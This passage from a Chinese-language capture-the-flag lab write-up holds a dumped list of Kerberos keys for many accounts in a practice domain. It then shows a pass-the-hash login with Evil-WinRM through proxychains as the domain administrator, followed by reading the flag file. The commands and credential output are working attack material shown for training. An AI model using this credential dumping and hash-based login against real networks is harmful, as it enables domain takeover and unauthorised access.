fpcorp.int\wang_a3:des-cbc-md5:01a138fe62ab7331
fpcorp.int\huang309:aes256-cts-hmac-sha1-96:4c134b95e62ac8dcae1c05dc1fe50d698131ee0da265526e200114f21c1703a0
fpcorp.int\huang309:aes128-cts-hmac-sha1-96:f70e93006a1511cbfb77974b168bb1fd
fpcorp.int\huang309:des-cbc-md5:1c075eb35437dc79
fpcorp.int\zhao_8:aes256-cts-hmac-sha1-96:41a8cf6c8e21c0892d5eababff4d58069067a90320cda6ddce07672cc5512134
fpcorp.int\zhao_8:aes128-cts-hmac-sha1-96:7df48570bfc6909cedd06fc7f857e877
fpcorp.int\zhao_8:des-cbc-md5:ec5223b00401b37c
fpcorp.int\liu386:aes256-cts-hmac-sha1-96:aa6f169d69f64a5bc91217b5619027e8dde3781678d1902b7be7fb8d097fd32c
fpcorp.int\liu386:aes128-cts-hmac-sha1-96:8421b0bdf185304ebe77942e48540163
fpcorp.int\liu386:des-cbc-md5:7a7a021a9183a131
fpcorp.int\chen.33:aes256-cts-hmac-sha1-96:22a8d1aa515010c483d5f389f444541d78adbc5e8d1eda5a61ecca7e099c3d5e
fpcorp.int\chen.33:aes128-cts-hmac-sha1-96:50f920d54266f5f95389dc878c1c39fa
fpcorp.int\chen.33:des-cbc-md5:a145bc54e33292d9
fpcorp.int\wu603:aes256-cts-hmac-sha1-96:24d711f87807d7dee21e3ce6f7fbd6c51f624413156958aea9b6df31edc8a411
fpcorp.int\wu603:aes128-cts-hmac-sha1-96:b61189b0e123daaea558f093c98f2ba4
fpcorp.int\wu603:des-cbc-md5:6e456280b53713ae
fpcorp.int\wu.a64:aes256-cts-hmac-sha1-96:5d21bd0044c7087de313fd7baeef3bd481fcfba30358669c89ca5bcd072b335e
fpcorp.int\wu.a64:aes128-cts-hmac-sha1-96:d30c11292a374283648d95e68a668109
fpcorp.int\wu.a64:des-cbc-md5:43c75ebf9e922f31
fpcorp.int\wang.i73:aes256-cts-hmac-sha1-96:1f08e4a98a0f040c090aa22ca7fe5096b3b9b5436dc28a02e60b0f52ac5264c8
fpcorp.int\wang.i73:aes128-cts-hmac-sha1-96:f63eea10ea908892824b946f74abfce5
fpcorp.int\wang.i73:des-cbc-md5:02b3643e6e2abf9d
fpcorp.int\liu.i37:aes256-cts-hmac-sha1-96:54c09c0c79eae763575236bf12966fb7c8ce8833a16e33eff260e851a0ccb518
fpcorp.int\liu.i37:aes128-cts-hmac-sha1-96:7b9eb065bdeaf5954c1cf72ea9ca8e06
fpcorp.int\liu.i37:des-cbc-md5:6773b04ca7344fea
fpcorp.int\zhang871:aes256-cts-hmac-sha1-96:06c2640309aba2771e73d2710ab3c62007359d214a398eb425821a0835721867
fpcorp.int\zhang871:aes128-cts-hmac-sha1-96:ff0e4064b707a9c6f19449d94ef0a45d
fpcorp.int\zhang871:des-cbc-md5:23d086e6237a5154
fpcorp.int\yang441:aes256-cts-hmac-sha1-96:2a696df575546dfc7d9cc7313b3b8e0d5f8efddd7050cdf5a7c5426fc7c65a70
fpcorp.int\yang441:aes128-cts-hmac-sha1-96:c47f05a54aade1643a84f5d4c46799c7
fpcorp.int\yang441:des-cbc-md5:914652b9a1615bc1
fpcorp.int\li515:aes256-cts-hmac-sha1-96:3fd14a62f3f0e30cc05761ebae97124fb550135480efadf07e9622ab14baea04
fpcorp.int\li515:aes128-cts-hmac-sha1-96:e7fe5d4d318934ccdccb6581e8bdea74
fpcorp.int\li515:des-cbc-md5:109bbc1fd3b9a7b3
fpcorp.int\chen.i15:aes256-cts-hmac-sha1-96:150e47b2bf07171b8f77c2be2a9553495f5ad8b0532b4eb4977cdc9d2b3ea03b
fpcorp.int\chen.i15:aes128-cts-hmac-sha1-96:f3bebf09598c2c8a17066d27b26775e8
fpcorp.int\chen.i15:des-cbc-md5:10629dd6835e070b
fpcorp.int\wu_3:aes256-cts-hmac-sha1-96:1c77087cd8dc162294fd24b16922c64b94325a3ee24d481592abd79a08195383
fpcorp.int\wu_3:aes128-cts-hmac-sha1-96:9de7341d69fddf1d5897ccc7ae08baba
fpcorp.int\wu_3:des-cbc-md5:2f4a1cea67704662
fpcorp.int\wu753:aes256-cts-hmac-sha1-96:8a405875ceb05745f245bc08275b578201963428e2997883d954f1210262f0b7
fpcorp.int\wu753:aes128-cts-hmac-sha1-96:2d06a86d4bdbfef011a7325ad7641f65
fpcorp.int\wu753:des-cbc-md5:c262ae4fdc972c57
fpcorp.int\zhao_6:aes256-cts-hmac-sha1-96:c2999d518412212507f3b42afbb670376d8216022f902a6e4ba9298db4342413
fpcorp.int\zhao_6:aes128-cts-hmac-sha1-96:1aee872c863a7d7771e1f193e6fbfc51
fpcorp.int\zhao_6:des-cbc-md5:0489b32c646b439e
fpcorp.int\zhou.88:aes256-cts-hmac-sha1-96:9b3815ff9b7d2b2b85ab357972aed520230956fd589a66d291ea5a1467e35b2e
fpcorp.int\zhou.88:aes128-cts-hmac-sha1-96:89dd43d50f556c2d56c460bcca0c7b57
fpcorp.int\zhou.88:des-cbc-md5:a45434fb23349dd5
fpcorp.int\chen535:aes256-cts-hmac-sha1-96:f8b509e9dba6b774aeb4544bb5f4994069157c71fe7b8160b1296bd1e0ba5012
fpcorp.int\chen535:aes128-cts-hmac-sha1-96:a82472c7d8d338f5b92638b364ecf4a8
fpcorp.int\chen535:des-cbc-md5:8cd38a5dad8cdf70
fpcorp.int\wu.63:aes256-cts-hmac-sha1-96:b3c4282f5e49050f6d1439feea677e0b9a48e40b983950e3c5a4f84fc82e6b61
fpcorp.int\wu.63:aes128-cts-hmac-sha1-96:cafa13ec332263e9c93ef750e343eea4
fpcorp.int\wu.63:des-cbc-md5:aef4895b54266e02
fpcorp.int\liu511:aes256-cts-hmac-sha1-96:7e2f6e395f7ae32f01287e3768cce9d9a85385e19eb1d9a2d792fa4f760e16ac
fpcorp.int\liu511:aes128-cts-hmac-sha1-96:b1ad96ce28dc67486ce2c3253b2080b2
fpcorp.int\liu511:des-cbc-md5:b01cb9a1d3fddf80
fpcorp.int\li_4:aes256-cts-hmac-sha1-96:27091cb5a222ceebc2780b6b1b99e5d23d7ead64e1b43014f8fa4c73a4c3719e
fpcorp.int\li_4:aes128-cts-hmac-sha1-96:ff0464857cfdeed5656bea9fa19241cb
fpcorp.int\li_4:des-cbc-md5:5429bc541c893eb3
fpcorp.int\li_a6:aes256-cts-hmac-sha1-96:52f5d4896498f0afa1bc61994be519b232f523580d62f66961c281c792d5864f
fpcorp.int\li_a6:aes128-cts-hmac-sha1-96:84db860c31c665b04f39b328d4822373
fpcorp.int\li_a6:des-cbc-md5:2cc79e0de9e5bcf7
fpcorp.int\chen.i95:aes256-cts-hmac-sha1-96:5fb09a2e1b47e49634576a69a42ae5532222bf86609c2866fe29b3422a55711a
fpcorp.int\chen.i95:aes128-cts-hmac-sha1-96:9885915d1df444dc1d6aa09a06156168
fpcorp.int\chen.i95:des-cbc-md5:c17afb7f3e324a4c
fpcorp.int\yang_a3:aes256-cts-hmac-sha1-96:ecbb79a5142a15c0562f297b8aa956f743170ac926cc34a182776b1d79940462
fpcorp.int\yang_a3:aes128-cts-hmac-sha1-96:1f6476115a1bf3486a027643682edb14
fpcorp.int\yang_a3:des-cbc-md5:645404d9a764543d
svc_bkpadmin:aes256-cts-hmac-sha1-96:80ae88eff1589f7860950fef0f5f63a81e8daaf81b86bc9e202affaa8223df95
svc_bkpadmin:aes128-cts-hmac-sha1-96:a10780d58cd791427367b3fb0f129e0c
svc_bkpadmin:des-cbc-md5:b0d9b64c5dae4a52
[*] Cleaning up...
8.4. PTH
最后利用域管哈希登录上去,拿下最后的flag
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q evil-winrm -i 172.22.20.25 -u administrator -H 972ffc4a036603066d388a1e28b4f583
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir
目录: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/1/2025 11:09 AM Dism++10.1.1002.1B
-a---- 7/1/2025 11:10 AM 1164 Active Directory Users and Computers.lnk
-a---- 2/5/2025 3:44 PM 617352 ADExplorer64.exe
-a---- 7/4/2025 10:25 AM 42 flag.txt
-a---- 7/5/2025 9:38 PM 2292 Microsoft Edge.lnk
*Evil-WinRM* PS C:\Users\Administrator\desktop> type flag.txt
flag{1f2fd1d1-adec-48de-beaf-8540d6e08d44}